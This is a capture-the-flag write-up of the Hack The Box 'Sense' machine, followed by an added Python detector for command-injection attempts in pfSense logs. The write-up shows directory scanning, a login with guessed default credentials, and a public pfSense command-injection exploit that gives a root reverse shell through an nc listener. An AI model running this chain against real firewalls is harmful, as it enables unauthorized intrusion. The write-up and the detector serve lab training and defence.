Sense
This box is fairly easy.
Scan
nmap scan
nmap -sSV -T4 -F 10.10.10.60
Web
dirsearch
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
So there is a firewall, it has vulnerabilities, and only 2 of the 3 have been patched.
gobuster
┌──(xavier㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/wfuzz/general/big.txt -u https://10.10.10.60 -k
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/wfuzz/general/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/05 22:14:24 Starting gobuster in directory enumeration mode
===============================================================
/~ (Status: 403) [Size: 345]
/classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
Progress: 3024 / 3025 (99.97%)
===============================================================
2023/04/05 22:15:57 Finished
===============================================================
No leads yet, so run a few more wordlists.
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e html,json,php,cgi,txt,jar -u https://10.10.10.60/ -x 403 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
This finds system-users.txt, which contains the following hint:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
The pfSense default credentials are admin/pfsense; in the end, rohit/pfsense logs in successfully.
root
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ searchsploit pfsense 2.1.3
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ searchsploit -m php/webapps/43560.py
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
Codes: CVE-2014-4688
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/xavier/Desktop/HTB/009-Sense/43560.py
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ python3 43560.py -h
usage: 43560.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT] [--username USERNAME]
[--password PASSWORD]
options:
-h, --help show this help message and exit
--rhost RHOST Remote Host
--lhost LHOST Local Host listener
--lport LPORT Local Port listener
--username USERNAME pfsense Username
--password PASSWORD pfsense Password
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.18 --lport 8888 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
With nc listening on the other side, the reverse shell comes in:
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.60] 19778
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
# cat /home/rohit/user.txt
872xxxxxxx
#
# cat /root/root.txt
d08xxxxxxx
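As an added defensive example (not part of this write-up and not pfSense code), the following Python scans web-server access logs for requests to the vulnerable status_rrd_graph_img.php script whose parameter values contain characters outside the charset an RRD database name or graph option needs, which is how a command-injection attempt against this script shows up in the log. The log lines are constructed, and the script assumes GUI access logging in Common Log Format is available.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Common Log Format; the addresses mirror the
# write-up's lab hosts and are not real traffic.
SAMPLE_LOG = """\
10.10.14.18 - - [05/Apr/2023:22:20:01 +0000] "GET /status_rrd_graph_img.php?database=queues&graph=day HTTP/1.1" 200 4321
10.10.14.18 - - [05/Apr/2023:22:20:05 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bmarker HTTP/1.1" 200 512
10.10.14.18 - - [05/Apr/2023:22:20:09 +0000] "GET /css/login.css HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# RRD database names and graph options only need letters, digits, dot, dash
# and underscore; anything else (";", "|", "$", quotes, spaces...) is unexpected.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9._-]*$")
WATCHED_SCRIPT = "/status_rrd_graph_img.php"


def split_query(query):
    """Split a query string on '&' only and percent-decode each side once.
    Done by hand so that ';' inside a value is kept as part of the value."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_params(target):
    """Return (name, value) pairs of a request target that hit the watched
    script with a value outside the expected charset; [] otherwise."""
    parts = urlsplit(target)
    if parts.path != WATCHED_SCRIPT:
        return []
    return [(k, v) for k, v in split_query(parts.query) if not SAFE_VALUE.match(v)]


def scan_log(text):
    """Return one finding per log line that carries unexpected input to the script."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (bad := suspicious_params(m.group("target"))):
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "params": bad})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} unexpected input to {WATCHED_SCRIPT}: {f['params']}")
```

A 200 response on a flagged request is worth treating as a likely compromise of an unpatched (< 2.1.4) firewall rather than a failed probe.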
#HTB #OSCP